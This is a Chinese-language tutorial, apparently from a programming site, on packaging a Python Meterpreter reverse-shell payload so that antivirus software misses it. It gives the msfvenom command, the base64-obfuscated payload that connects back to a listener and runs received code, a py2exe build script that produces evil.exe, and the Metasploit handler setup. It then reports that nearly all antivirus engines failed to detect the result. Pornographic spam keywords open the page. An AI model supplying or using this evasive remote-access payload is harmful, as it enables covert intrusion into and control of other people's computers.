欧美bbbwbbbw肥妇,免费乱码人妻系列日韩,一级黄片

使用Python進(jìn)行防病毒免殺解析

 更新時(shí)間:2019年12月13日 09:09:59   作者:Bypass  
這篇文章主要介紹了使用Python進(jìn)行防病毒免殺,本文給大家介紹的非常詳細(xì),具有一定的參考借鑒價(jià)值,需要的朋友可以參考下

很多滲透工具都提供了權(quán)限維持的能力,如Metasploit、Empire和Cobalt Strike,但是都會被防病毒軟件檢測到這種惡意行為。在探討一個(gè)權(quán)限維持技巧的時(shí)候,似乎越來越多的人關(guān)注的是,這個(gè)方式會不會被被殺軟殺掉?

打造免殺的payload成了一個(gè)很重要的話題,在這里,本文將介紹如何使用Pyhton輕松繞過防病毒軟件。

0x01 環(huán)境準(zhǔn)備

1、軟件安裝

Python 2.7.16 x86:https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位:https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

evil.py 代碼如下:

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

將evil.py復(fù)制到windows,同時(shí)創(chuàng)建一個(gè)setup.py文件:

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法運(yùn)行 evil.py,生成可執(zhí)行文件。

python ./setup.py py2exe

0x03 設(shè)置監(jiān)聽端口

Kali 運(yùn)行Metasploit,設(shè)置監(jiān)聽:

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中運(yùn)行evil.exe,獲得一個(gè)meterpreter的會話

0x04 免殺驗(yàn)證

確認(rèn)生成的exe文件可正常工作,接下來對evil.exe進(jìn)行在線病毒掃描,以確認(rèn)免殺效果如何。
這里我們使用VirSCAN.org-多引擎在線病毒掃描網(wǎng) v1.02,當(dāng)前支持 47 款殺毒引擎

掃描結(jié)果:47款殺毒引擎中,只有一個(gè)引擎報(bào)毒,主流的殺毒軟件全部繞過。

網(wǎng)站地址: http://www.virscan.org 

參考文章:

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

總結(jié)

以上所述是小編給大家介紹的使用Python進(jìn)行防病毒免殺,希望對大家有所幫助,如果大家有任何疑問請給我留言,小編會及時(shí)回復(fù)大家的。在此也非常感謝大家對腳本之家網(wǎng)站的支持!
如果你覺得本文對你有幫助,歡迎轉(zhuǎn)載,煩請注明出處,謝謝!

相關(guān)文章

  • python/sympy求解矩陣方程的方法

    python/sympy求解矩陣方程的方法

    今天小編就為大家分享一篇python/sympy求解矩陣方程的方法,具有很好的參考價(jià)值,希望對大家有所幫助。一起跟隨小編過來看看吧
    2018-11-11
  • Python中的常見數(shù)據(jù)集打亂方法

    Python中的常見數(shù)據(jù)集打亂方法

    這篇文章主要介紹了Python中的常見數(shù)據(jù)集打亂方法,具有很好的參考價(jià)值,希望對大家有所幫助。如有錯(cuò)誤或未考慮完全的地方,望不吝賜教
    2023-02-02
  • Python復(fù)合賦值運(yùn)算符由淺入深實(shí)例探究

    Python復(fù)合賦值運(yùn)算符由淺入深實(shí)例探究

    這篇文章主要為大家介紹了Python復(fù)合賦值運(yùn)算符由淺入深實(shí)例探究,有需要的朋友可以借鑒參考下,希望能夠有所幫助,祝大家多多進(jìn)步,早日升職加薪
    2024-01-01
  • python刪除文件示例分享

    python刪除文件示例分享

    這篇文章主要介紹了刪除文件夾下所有文件和子文件夾的示例,大家參考使用吧
    2014-01-01
  • 想學(xué)python 這5本書籍你必看!

    想學(xué)python 這5本書籍你必看!

    想學(xué)python,這5本書籍你必看!本文為大家推薦了學(xué)習(xí)python的5本書籍,5本經(jīng)典書籍,感興趣的小伙伴們可以參考一下
    2018-12-12
  • python網(wǎng)絡(luò)編程學(xué)習(xí)筆記(八):XML生成與解析(DOM、ElementTree)

    python網(wǎng)絡(luò)編程學(xué)習(xí)筆記(八):XML生成與解析(DOM、ElementTree)

    DOM是Document Object Model的簡稱,XML 文檔的高級樹型表示。該模型并非只針對 Python,而是一種普通XML 模型。Python 的 DOM 包是基于 SAX 構(gòu)建的,并且包括在 Python 2.0 的標(biāo)準(zhǔn) XML 支持里
    2014-06-06
  • python使用協(xié)程實(shí)現(xiàn)并發(fā)操作的方法詳解

    python使用協(xié)程實(shí)現(xiàn)并發(fā)操作的方法詳解

    這篇文章主要介紹了python使用協(xié)程實(shí)現(xiàn)并發(fā)操作的方法,結(jié)合實(shí)例形式詳細(xì)分析了Python協(xié)程的原理及使用Gevent實(shí)現(xiàn)協(xié)程操作的相關(guān)技巧與操作注意事項(xiàng),需要的朋友可以參考下
    2019-12-12
  • Python中元組的概念及應(yīng)用小結(jié)

    Python中元組的概念及應(yīng)用小結(jié)

    Python中的元組和列表很相似,元組也是Python語言提供的內(nèi)置數(shù)據(jù)結(jié)構(gòu)之一,可以在代碼中直接使用,這篇文章主要介紹了Python中元組的概念以及應(yīng)用,需要的朋友可以參考下
    2023-01-01
  • pymongo如何通過oplog獲取數(shù)據(jù)(mongodb)

    pymongo如何通過oplog獲取數(shù)據(jù)(mongodb)

    使用MongoDB的oplog(操作日志)進(jìn)行數(shù)據(jù)同步是高級的用法,主要用于復(fù)制和故障恢復(fù),這篇文章主要介紹了pymongo通過oplog獲取數(shù)據(jù)(mongodb),需要的朋友可以參考下
    2023-09-09
  • python進(jìn)階教程之循環(huán)對象

    python進(jìn)階教程之循環(huán)對象

    這篇文章主要介紹了python進(jìn)階教程之循環(huán)對象,循環(huán)對象是這樣一個(gè)對象,它包含有一個(gè)next()方法,這個(gè)方法的目的是進(jìn)行到下一個(gè)結(jié)果,需要的朋友可以參考下
    2014-08-08

最新評論